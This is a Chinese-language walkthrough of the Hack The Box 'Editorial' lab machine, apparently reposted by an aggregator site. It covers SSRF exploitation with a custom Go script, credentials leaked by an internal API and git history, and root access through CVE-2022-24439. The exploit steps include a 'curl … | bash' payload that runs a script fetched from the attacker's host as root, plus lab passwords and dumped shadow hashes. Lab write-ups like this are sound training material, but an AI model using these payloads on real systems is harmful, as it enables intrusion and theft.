HTB Editorial

Editorial

User

Nmap

┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ nmap -A 10.129.24.67 -T 4                                               
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-16 21:54 EDT
Nmap scan report for 10.129.24.67
Host is up (0.57s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_  256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.48 seconds

经典两端口

22,80

img

点击preview 收到了这个请求

└─$ nc -lvnkp 80                                                            
listening on [any] 80 ...

connect to [10.10.16.2] from (UNKNOWN) [10.129.24.67] 49816
GET / HTTP/1.1
Host: 10.10.16.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

可以知道server是由python写的

这里就是存在一个ssrf

然后远程这个链接访问后需要识别内容是图片不然图片路径就会是 unsplash_photo

如:/static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg

在这里我尝试file伪协议尝试读文件,发现还是不可以

port-scan

┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]                                                                 
└─$ ffuf -request request -w port -v    -c -v  -request-proto http -fs 61                                             
                                                                                                                      
        /'___\  /'___\           /'___\                                                                               
       /\ \__/ /\ \__/  __  __  /\ \__/                                                                               
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\                                                                              
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/                                                                              
         \ \_\   \ \_\  \ \____/  \ \_\                                                                               
          \/_/    \/_/   \/___/    \/_/                    
                                                                                                                                                                                                                                            
       v2.1.0-dev                                                                                                     
________________________________________________                                                                      
                                                                                                                      
 :: Method           : POST                                                                                                               
 :: URL              : http://editorial.htb/upload-cover                                                                                 
 :: Wordlist         : FUZZ: /home/kali/HTB/machine/SeasonV/linux/Editorial/port                                                          
 :: Header           : Accept: */*                                                                                    
 :: Header           : Origin: http://editorial.htb                                                                   
 :: Header           : Referer: http://editorial.htb/upload                                                                              
 :: Header           : Accept-Encoding: gzip, deflate, br                                                                                
 :: Header           : Connection: keep-alive                                                                                             
 :: Header           : Host: editorial.htb                 
 :: Header           : User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
 :: Header           : Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryV1WXq3yjFotyeO70                                 
 :: Header           : Accept-Language: en-US,en;q=0.9                                                                                    
 :: Data             : ------WebKitFormBoundaryV1WXq3yjFotyeO70                                                                          
Content-Disposition: form-data; name="bookurl"             
                                                                                                                      
http://127.0.0.1:FUZZ                                                                                                 
------WebKitFormBoundaryV1WXq3yjFotyeO70                                                                                                  
Content-Disposition: form-data; name="bookfile"; filename="Screenshot_2024-06-06_22_57_29.png"                                           
Content-Type: image/png                                                                                               
                                                                                                                      
                                                           
------WebKitFormBoundaryV1WXq3yjFotyeO70--                 
                                                                                                                      
                                                                                                                      
 :: Follow redirects : false                               
 :: Calibration      : false                               
 :: Timeout          : 10                                                                                             
 :: Threads          : 40                                                                                             
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500                                                              
 :: Filter           : Response size: 61                   
________________________________________________           
                                                                                                                                          
[Status: 200, Size: 51, Words: 1, Lines: 1, Duration: 2710ms]                                                                            
| URL | http://editorial.htb/upload-cover                            
    * FUZZ: 5000      

5000 port

对内部端口进行枚举,发现5000端口回显不一样

img

img

┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ cat api |jq '.'                                                                                                                                             
{
  "messages": [
    {
      "promotions": {
        "description": "Retrieve a list of all the promotions in our library.",
        "endpoint": "/api/latest/metadata/messages/promos",
        "methods": "GET"
      }
    },
    {
      "coupons": {
        "description": "Retrieve the list of coupons to use in our library.",
        "endpoint": "/api/latest/metadata/messages/coupons",
        "methods": "GET"
      }
    },
    {
      "new_authors": {
        "description": "Retrieve the welcome message sended to our new authors.",
        "endpoint": "/api/latest/metadata/messages/authors",
        "methods": "GET"
      }
    },
    {
      "platform_use": {
        "description": "Retrieve examples of how to use the platform.",
        "endpoint": "/api/latest/metadata/messages/how_to_use_platform",
        "methods": "GET"
      }
    }
  ],
  "version": [
    {
      "changelog": {
        "description": "Retrieve a list of all the versions and updates of the api.",
        "endpoint": "/api/latest/metadata/changelog",
        "methods": "GET"
      }
    },
    {
      "latest": {
        "description": "Retrieve the last version of api.",
        "endpoint": "/api/latest/metadata",
        "methods": "GET"
      }
    }
  ]
}

这样就会每次都要发两个请求,写了一个简单go 脚本

Request.go

┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]                                                                                                                                                         
└─$ cat test.go                                                                                                                                                                                               
package main                                                                                                                                                                                                  
                                                                                                                                                                                                              
import (                                                                                                                                                                                                      
    "bytes"                                                                                                                                                                                                   
    "fmt"                                                                                                                                                                                                     
    "strings"                                                                                                                                                                                                 
    "net/url"                                                                                                                                                                                                 
    "io"                                                                                                                                                                                                      
    "io/ioutil"                                                                                                                                                                                               
    "mime/multipart"                                                                                                                                                                                          
    "net/http"                                                                                                                                                                                                
    "flag"                                                                                                                                                                                                    
    "os"                                                                                                                                                                                                      
)                                                                                                                                                                                                             
                                                                                                                                                                                                              
var (                                                                                                                                                                                                         
                                                                                                                                                                                                              
        bookurl = flag.String("bookuri","","api URI")                                                                                                                                                         
        ProxyURL   = flag.String("proxy","","http proxy Exm: http://127.0.0.1:8080")                                                                                                                          
)                                                                                                                                                                                                             
                                                                                                                                                                                                              
                                                                                                                                                                                                              
func SecondRequest(uri string){                                                                                                                                                                               
                                                                                                                                                                                                              
        var requestBody bytes.Buffer                                                                                                                                                                          
        req,err := http.NewRequest("GET",fmt.Sprintf("http://editorial.htb/%s",uri),&requestBody)                                                                                                             
        if err!=nil{                                                                                                                                                                                          
                fmt.Println(err)                                                                                                                                                                              
                return                                                                                                                                                                                        
        }                                                                                                                                                                                                     
        var client * http.Client                                                                                                                                                                              
        if *ProxyURL!=""{                                                                                                                                                                                     
           proxyURL ,err := url.Parse(*ProxyURL)                                                                                                                                                              
           if err!=nil{                             
                fmt.Println(err)                                                                                                                                                                              
                return                                                                                                                                                                                        
                                                   
           }                                                                                            
           client = &http.Client{                                                                       
                Transport: &http.Transport{                                                             
                        Proxy: http.ProxyURL(proxyURL),
                },                                                                                      
           }                      
                                                                     
        }else{                    
                client = &http.Client{}                                                                 

                                                                                                                                           
        }                                                            
        resp, err := client.Do(req)                                                                     
        if err!=nil{                                                                                                                       
                fmt.Println(err)                                                                                                           
                return                                                                                  
                                                                     
        }                                                                                                                                                              
        body , err := ioutil.ReadAll(resp.Body)                                                         
        if err!=nil{                     
                fmt.Println(err)                                                                        
                return                   

        }                                                                                               
        strBody := string(body)                                                                         
        fmt.Println("---------------")                                                                  
        fmt.Println(strBody)                                                                            

                                                                                                        
}                                                                                                       
                                                    
func main() {                                                        
                                                                     
    flag.Parse()                                                     
                                                                     
    if *bookurl==""{                                                 
        fmt.Println("bookuri is need")                               
        return                                                       
    }                                                                
                                                                     
    // 创建一个 buffer,我们会把请求的 body 写入这个 buffer 中        
    var requestBody bytes.Buffer                                     

    // 创建一个 multipart writer,这个 writer 会把内容写入我们之前创建的 buffer 中
    multiPartWriter := multipart.NewWriter(&requestBody)              

    // 添加第一个 form-data 参数                                     
    formFieldWriter, err := multiPartWriter.CreateFormField("bookurl")
    if err != nil {                                                                                     
        fmt.Println(err)                                             
        return                                                                                                                             
    }                                                                
                                                                     
                                                                     
                                                                     
    formFieldWriter.Write([]byte(fmt.Sprintf("http://127.0.0.1:5000%s",*bookurl)))
                                                                     
                                                                     
    // 添加第二个 form-data 参数,这个参数带有文件内容                                                                                                                                                                                                                                
    fileWriter, err := multiPartWriter.CreateFormFile("bookfile", "Screenshot_2024-06-06_22_57_29.png")
    if err != nil {                                                                                                                        
        fmt.Println(err)                                                                                                                   
        return                                                                                                                             
    }                                                                                                                                      
                                                                                                        
    // 打开文件                                                                                         
    file, err := os.Open("test.png")                                                                    
    if err != nil {                                                                                     
        fmt.Println("Error opening file: ", err)                                                        
        return                                                                                          
    }                                                                                                   
    defer file.Close()                                                                                  
                                                                                                        
    // 把文件内容 copy 到 writer 中                                                                     
    io.Copy(fileWriter, file)                                                                           

    // 结束 multipart writer                                                                            
    multiPartWriter.Close()                                                                             
                                                                                                        
    // 创建一个 HTTP 请求                                                                               
    req, err := http.NewRequest("POST", "http://editorial.htb/upload-cover", &requestBody)
    if err != nil {                                                                                     
        fmt.Println(err)                                                                                
        return                                                                                          
    }                                                                                                   

    // 为 HTTP 请求添加必要的 header 字段                                                               
    req.Header.Add("Host", "editorial.htb")                                                             
    req.Header.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36")                                                         
    req.Header.Add("Accept", "*/*")                                                                     
    req.Header.Add("Origin", "http://editorial.htb")
    req.Header.Add("Referer", "http://editorial.htb/upload")
    req.Header.Add("Accept-Encoding", "gzip, deflate, br")
    req.Header.Add("Accept-Language", "en-US,en;q=0.9")
    req.Header.Add("Connection", "close")                                                               
                                                                                                        
    // 设置内容类型,这里是 multipart form-data                                                         
    req.Header.Set("Content-Type", multiPartWriter.FormDataContentType())
                                                                                                        
    var client * http.Client                                                                            
    if *ProxyURL!=""{                                                                                   
          proxyURL,err := url.Parse(*ProxyURL)                                                          
          if err!=nil{                                                                                  
                fmt.Println(err)                                                                        
                return                                                                                  

          }                                                                                             
          client = &http.Client{                                                                        
              Transport: &http.Transport{                                                               
                Proxy: http.ProxyURL(proxyURL),                                                         

              },                                                                                        
          }                                                                                             
    }else{                                                                                              

        client = &http.Client{}                                                                         

    }                                                                                                   
                                                                                                        
                                                                                                        

    resp, err := client.Do(req)                                                                         
    if err != nil {                                                                                     
        fmt.Println(err)                                                                                
        return                                                                                          
    }                                                                                                   

                                                                                                        
    fmt.Println("Response status:", resp.Status)                                                        

    body ,err := ioutil.ReadAll(resp.Body)                                                              
    if err!=nil{                                                                                        
        fmt.Println(err)                                                                                
        return                                                                                          

    }                                                                                                   
    strBody := string(body)                                                                             
    if strings.Contains(strBody,"unsplash"){                                                            
        fmt.Println("err uri")                                                                          
        return                                                                                          
    }                                                                                                   
    fmt.Println("Len Body: ",len(strBody))                                                              
    fmt.Println(strBody)                                                                                

    SecondRequest(strBody)                                                                              
}      
┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ ./test -bookuri '/api' --proxy http://127.0.0.1:8080
Response status: 200 OK
Len Body:  51
static/uploads/fa55a699-849a-4df1-8a36-7b39e756a8ce
---------------
{"messages":[{"promotions":{"description":"Retrieve a list of all the promotions in our library.","endpoint":"/api/latest/metadata/messages/promos","methods":"GET"}},{"coupons":{"description":"Retrieve the list of coupons to use in our library.","endpoint":"/api/latest/metadata/messages/coupons","methods":"GET"}},{"new_authors":{"description":"Retrieve the welcome message sended to our new authors.","endpoint":"/api/latest/metadata/messages/authors","methods":"GET"}},{"platform_use":{"description":"Retrieve examples of how to use the platform.","endpoint":"/api/latest/metadata/messages/how_to_use_platform","methods":"GET"}}],"version":[{"changelog":{"description":"Retrieve a list of all the versions and updates of the api.","endpoint":"/api/latest/metadata/changelog","methods":"GET"}},{"latest":{"description":"Retrieve the last version of api.","endpoint":"/api/latest/metadata","methods":"GET"}}]}

                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ ./test -bookuri '/api/latest/metadata/messages/coupons' --proxy http://127.0.0.1:8080                                                                                                                    
Response status: 200 OK
Len Body:  51
static/uploads/93e1d12a-99cb-43f9-bb74-153bd09a6057
---------------
[{"2anniversaryTWOandFOURread4":{"contact_email_2":"info@tiempoarriba.oc","valid_until":"12/02/2024"}},{"frEsh11bookS230":{"contact_email_2":"info@tiempoarriba.oc","valid_until":"31/11/2023"}}]

                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ ./test -bookuri '/api/latest/metadata/messages/promos' --proxy http://127.0.0.1:8080                                                                                                                                                   
Response status: 200 OK
Len Body:  51
static/uploads/69a0f1fc-b13a-4b45-af9d-5202f79de6f7
---------------
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ ./test -bookuri '/api/latest/metadata/messages/authors' --proxy http://127.0.0.1:8080                                                                                                                                                  
Response status: 200 OK
Len Body:  51
static/uploads/a677a473-cf55-4fe7-b4ec-ffd158dc82d8
---------------
{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ ./test -bookuri '/api/latest/metadata/messages/how_to_use_platform' --proxy http://127.0.0.1:8080                                                                                                                                      
Response status: 200 OK
Len Body:  51
static/uploads/537c54ad-3223-42a8-8ca0-62a2e0fbed91
---------------
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ ./test -bookuri '/api/latest/metadata/changelog' --proxy http://127.0.0.1:8080                                                                                                                                                         
Response status: 200 OK
Len Body:  51
static/uploads/d13bf701-c1b2-44c5-a520-e95de5f0b753
---------------
[{"1":{"api_route":"/api/v1/metadata/","contact_email_1":"soporte@tiempoarriba.oc","contact_email_2":"info@tiempoarriba.oc","editorial":"Editorial El Tiempo Por Arriba"}},{"1.1":{"api_route":"/api/v1.1/metadata/","contact_email_1":"soporte@tiempoarriba.oc","contact_email_2":"info@tiempoarriba.oc","editorial":"Ed Tiempo Arriba"}},{"1.2":{"contact_email_1":"soporte@tiempoarriba.oc","contact_email_2":"info@tiempoarriba.oc","editorial":"Editorial Tiempo Arriba","endpoint":"/api/v1.2/metadata/"}},{"2":{"contact_email":"info@tiempoarriba.moc.oc","editorial":"Editorial Tiempo Arriba","endpoint":"/api/v2/metadata/"}}]

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ ./test -bookuri '/api/latest/metadata' --proxy http://127.0.0.1:8080                                                                                                                                                                   
Response status: 200 OK
Len Body:  51
static/uploads/d3514789-a0f3-42cc-ac6a-a6ade09bf861
---------------
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

/api/latest/metadata/messages/authors这个接口返回了用户凭证信息

User: dev Password: dev080217_devAPI!@

使用该凭证成功登录ssh

┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ ssh dev@editorial.htb         
The authenticity of host 'editorial.htb (10.129.59.45)' can't be established.
ED25519 key fingerprint is SHA256:YR+ibhVYSWNLe4xyiPA0g45F4p1pNAcQ7+xupfIR70Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'editorial.htb' (ED25519) to the list of known hosts.
dev@editorial.htb's password: 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Tue Jun 18 03:47:13 AM UTC 2024

  System load:           0.08
  Usage of /:            60.9% of 6.35GB
  Memory usage:          12%
  Swap usage:            0%
  Processes:             224
  Users logged in:       0
  IPv4 address for eth0: 10.129.59.45
  IPv6 address for eth0: dead:beef::250:56ff:fe94:bc3

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Jun 10 09:11:03 2024 from 10.10.14.52
dev@editorial:~$ ls
apps  user.txt
dev@editorial:~$ cat user.txt

Root

dev@editorial:~/apps$ ls -al                                                                                                                                                                                
total 12                                                                                                                                                                                                    
drwxrwxr-x 3 dev dev 4096 Jun  5 14:36 .                                                                                                                                                                    
drwxr-x--- 4 dev dev 4096 Jun  5 14:36 ..                                                                                                                                                                   
drwxr-xr-x 8 dev dev 4096 Jun  5 14:36 .git  

当前目录存在 .git 目录,我们可以看看历史commit 的信息

prod

dev@editorial:~/apps$ git log                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         
commit 8ad0f3187e2bda88bba85074635ea942974587e8 (HEAD -> master)                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
Date:   Sun Apr 30 21:04:21 2023 -0500                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
    fix: bugfix in api port endpoint                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
commit dfef9f20e57d730b7d71967582035925d57ad883                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
Date:   Sun Apr 30 21:01:11 2023 -0500                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
    change: remove debug and update api port                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
Date:   Sun Apr 30 20:55:08 2023 -0500                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
    change(api): downgrading prod to dev                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
    * To use development environment.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
commit 1e84a036b2f33c59e2390730699a488c65643d28                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
Date:   Sun Apr 30 20:51:10 2023 -0500                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
    feat: create api to editorial info                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
    * It (will) contains internal info about the editorial, this enable                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               
       faster access to information.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
commit 3251ec9e8ffdd9b938e83e3b9fbf5fd1efa9bbb8                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
Date:   Sun Apr 30 20:48:43 2023 -0500                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
    feat: create editorial app                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
                                                                                                                                         
    * This contains the base of this project.                                                                                            
    * Also we add a feature to enable to external authors send us their                                                                  
       books and validate a future post in our editorial.    
       
dev@editorial:~/apps$ git diff 3251 1e84
diff --git a/app_api/app.py b/app_api/app.py
new file mode 100644
index 0000000..61b786f
--- /dev/null
+++ b/app_api/app.py
@@ -0,0 +1,74 @@
+# API (in development).
+# * To retrieve info about editorial
+
+import json
+from flask import Flask, jsonify
+
+# -------------------------------
+# App configuration
+# -------------------------------
+app = Flask(__name__)
+
+# -------------------------------
+# Global Variables
+# -------------------------------
+api_route = "/api/latest/metadata"
+api_editorial_name = "Editorial Tiempo Arriba"
+api_editorial_email = "info@tiempoarriba.htb"
+
+# -------------------------------
+# API routes
+# -------------------------------
+# -- : home
+@app.route('/api', methods=['GET'])
+def index():
+    data_editorial = {
+        'version': [{
+@app.route('/api', methods=['GET'])
+def index():
+    data_editorial = {
+        'version': [{
+    data_editorial = {
+        'version': [{
+            '1': {
+                'editorial': 'Editorial El Tiempo Por Arriba', 
+                'contact_email_1': 'soporte@tiempoarriba.oc',
+                'contact_email_2': 'info@tiempoarriba.oc',
+                'api_route': '/api/v1/metadata/'
+            }},
+            {
+            '1.1': {
+                'editorial': 'Ed Tiempo Arriba', 
+                'contact_email_1': 'soporte@tiempoarriba.oc',
+                'contact_email_2': 'info@tiempoarriba.oc',
+                'api_route': '/api/v1.1/metadata/'
+            }},
+            {
+            '1.2': {
+                'editorial': api_editorial_name, 
+                'contact_email_1': 'soporte@tiempoarriba.oc',
+                'contact_email_2': 'info@tiempoarriba.oc',
+                'api_route': f'/api/v1.2/metadata/'
+            }},
+            {
+            '2': {
+                'editorial': api_editorial_name, 
+                'contact_email': 'info@tiempoarriba.moc.oc',
+                'api_route': f'/api/v2/metadata/'
+            }},
+            {
+            '2.3': {
+                'editorial': api_editorial_name, 
+                'contact_email': api_editorial_email,
+                'api_route': f'{api_route}/'
+            }
+        }]
+    }
+    return jsonify(data_editorial)
+
+# -- : (development) mail message to new authors
+@app.route(api_route + '/authors/message', methods=['GET'])
+def api_mail_new_authors():
+    return jsonify({
+        'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\
nUsername: prod\nPassword: 080217_Producti0n_2023!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.
\n\nBest regards, " + api_editorial_name + " Team."
+    }) # TODO: replace dev credentials when checks pass
+
+# -------------------------------
+# Start program
+# -------------------------------
+if __name__ == '__main__':
+    app.run(host='127.0.0.1', port=5001, debug=True)
dev@editorial:~/apps$ cat /etc/passwd|grep bash
root:x:0:0:root:/root:/bin/bash
prod:x:1000:1000:Alirio Acosta:/home/prod:/bin/bash
dev:x:1001:1001::/home/dev:/bin/bash
dev@editorial:~/apps$ su prod 
Password: 
prod@editorial:/home/dev/apps$ id
uid=1000(prod) gid=1000(prod) groups=1000(prod)
prod@editorial:/home/dev/apps$ ls
prod@editorial:/home/dev/apps$ sudo -l
[sudo] password for prod: 
Matching Defaults entries for prod on editorial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *

通过git diff 获取到了prod用户的凭证

prod: 080217_Producti0n_2023!@

clone_prod_change.py

prod@editorial:~$ cat /opt/internal_apps/clone_changes/clone_prod_change.py 
#!/usr/bin/python3

import os
import sys
from git import Repo

os.chdir('/opt/internal_apps/clone_changes')

url_to_clone = sys.argv[1]

r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])

这是一个使用 Python 和 GitPython 库的脚本。以下是一行一行的解释这段代码:
#!/usr/bin/python3 这个是一个称为 shebang(或 hashbang)的特殊行,它告诉系统应使用哪个解释器来执行脚本。在这里,我们指定脚本将由位于 /usr/bin/python3 的 Python 3 解释器执行。
import os 和 import sys 这两行导入了 Python 的标准库模块 os 和 sys。os 模块用于与操作系统交互,sys 模块用于处理 Python 运行时环境的一些操作,如获取命令行参数。
from git import Repo 这一行导入了 GitPython 库的 Repo 类,用于操作 Git 仓库。
os.chdir('/opt/internal_apps/clone_changes') 这行代码使用 os 模块的 chdir 函数将当前工作目录修改为 /opt/internal_apps/clone_changes。
url_to_clone = sys.argv[1] 这行代码取命令行的第一个参数(在 Python 中,索引从 0 开始,sys.argv[0] 是脚本名,因此 sys.argv[1] 是第一个参数),并将其存储在 url_to_clone 中。
r = Repo.init('', bare=True) 这行代码创建了一个新的 Repo 对象(一个代表 Git 仓库的对象),并以 "bare" 模式初始化它。在 Git 中,一个 "bare" 仓库是没有工作目录的仓库,只包含 Git 内部的数据。
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"]) 这行代码从 url_to_clone 中克隆一个 Git 仓库,并将其作为名为 "new_changes" 的新目录。multi_options 参数中传入了一个允许所有协议的配置项。

CVE-2022-24439

Referer:

Remote Code Execution (RCE) in gitpython | CVE-2022-24439 | Snyk

from git import Repo
r = Repo.init('', bare=True)
r.clone_from('ext::sh -c touch% /tmp/pwned', 'tmp', multi_options=["-c protocol.ext.allow=always"])

这个漏洞之前Season IV FormulaX 也存在这个利用手法

ext::sh -c curl% http://10.10.16.13/1.sh|bash >&2

img

prod@editorial:~$ sudo -l 
[sudo] password for prod: 
Matching Defaults entries for prod on editorial:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *
prod@editorial:~$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c curl% http://10.10.16.4/1.sh|bash >&2'  

In Summary

user:

upload-conver (ssrf) → enum port 5000 → api → cred info

root:

git diff → cve-2022-24439 → root

Shadow

root@editorial:~# cat /etc/shadow |grep \$y
cat /etc/shadow |grep \$y
root:$y$j9T$PNijPFzQRd1/Yx6sr4HqS.$ITtQp.k4TN0RY1ADcvcSb.b9UcxD6Jx0MDNL3odgsV9:19878:0:99999:7:::
prod:$y$j9T$bQEMwg1M5mDlBp9UM9YAM0$y8V8Rl64myknJa31Tzt/x9hQpzavDce2vGK9K8y316.:19394:0:99999:7:::
dev:$y$j9T$KcdXrIRoJN69I1Ez4Zx1B/$Jc/EJctFUl4/PaL2RvwUWccq5zC4ep2KtIhMDtbTdn6:19390:0:99999:7:::

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/720945.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

03-ES6新语法

1. ES6 函数 1.1 函数参数的扩展 1.1.1 默认参数 function fun(name,age17){console.log(name","age); } fn("张美丽",18); // "张美丽",18 fn("张美丽",""); // "张美丽" fn("张美丽"); // &…

嵌入式技术学习——c51单片机——蜂鸣器

一、蜂鸣器介绍 蜂鸣器时一种将电信号转化成声音信号的器件&#xff0c;常用来产生设备的按键音&#xff0c;报警音等提示信号。 蜂鸣器分为有源蜂鸣器&#xff0c;无源蜂鸣器 。 有源蜂鸣器&#xff1a;内部自带震荡源&#xff0c;将正负极街上直流电压即可持续发声&#x…

Windows系统部署本地SQL_Server指引

Windows系统部署本地SQL_Server指引 此指引文档环境为Windows10系统&#xff0c;部署SQL_Server 2019为例&#xff0c;同系列系统软件安装步骤类似。 一、部署前准备&#xff1b; 下载好相关镜像文件&#xff1b;设备系统启动后&#xff0c;将不必要的软件停用&#xff0c;避…

全开源版人才招聘系统源码 小程序运营级平台源码 类似58同城招聘、智联招聘平台

在当今数字化时代&#xff0c;人才招聘与平台运营成为了企业发展的重要环节。分享一套功能全面、易于二次开发的人才招聘系统源码小程序运营级平台源码。这些源码基于类似58同城招聘、智联招聘等大型招聘平台的设计理念&#xff0c;旨在为企业提供高效、便捷的人才招聘与平台运…

HCIP认证笔记(填空)

1、为防止攻击者伪造BGP报文对设备进行攻击,可以通过配置GTSM功能检测IP报文中的TTL值的范围来对设备进行保护。如果某台设备配置了“peer x.x.x.x valid-ttl-hops 100",则被检测的报文的TTL值的有效范围为【(156),255】; 解析: peer {group-name | ipv4-address…

排序——快速排序

